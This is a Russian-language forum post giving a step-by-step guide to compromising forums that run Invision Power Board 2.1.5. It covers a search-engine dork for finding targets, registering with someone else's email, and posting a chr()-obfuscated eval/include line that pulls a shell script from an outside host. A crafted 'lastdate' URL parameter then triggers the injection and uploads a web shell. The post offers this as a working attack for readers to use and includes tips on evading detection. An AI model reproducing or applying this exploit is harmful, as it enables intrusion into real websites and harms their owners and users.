User
Сообщений: 1605
Оценки: 0
Присоединился: 2006-10-15 02:44:55.710000
|
IPB 2.1.5
Всем привет!!!
В этой статье я хочу рассказать по
взлом Форума сделаного на движке IPB 2.1.5
1)Как обычно мы идем поисковую систему
например в www.google.ru
там вводим Powered by invision power board v2.1.5 site:.ru inurl:index.php
2)регаемся на этом сайте
в поле мыло надо вводить не своё
настоящее мыло а чьё - нибудь (левое мыло) к которому
вы имеете доступ.
ну вот прошла удачно регистрация!
3)теперь надо найти тему которую никто в
данный момент не смотрит. что-бы не запалиться.
4)теперь в поле сообщение вводим
вот эту строчку(пока ресурс работает пользуйтесь)
eval(include(chr(104).chr(116).chr(116).chr(112).chr(58).chr(47).chr(47).chr(97).chr(110).chr(117).chr(116).chr(97).chr(45).chr(114).chr(101).chr(98).chr(101).chr(110).chr(111).chr(107).chr(46).chr(98).chr(121).chr(46).chr(114).chr(117).chr(47).chr(115).chr(104).chr(46).chr(116).chr(120).chr(116))); //
5)далее надо пойти в поиск на данном форуме(который ломаете)
ввети там eval и ник под которым вы зарегились.
переходите на найденую вашу страничку
и в своем броузере где написана ссылка дописываете
вот это: lastdate=z|eval.*?%20//)%23e%00
6)при помоши сделанного выше вы заливаете шелл
но после удаления поста вы на него не попадете!
спасибо за внимание!!!
над статьей работал REDsaratov, Stefun, Web_Slayer.
|
Статья №3 - 
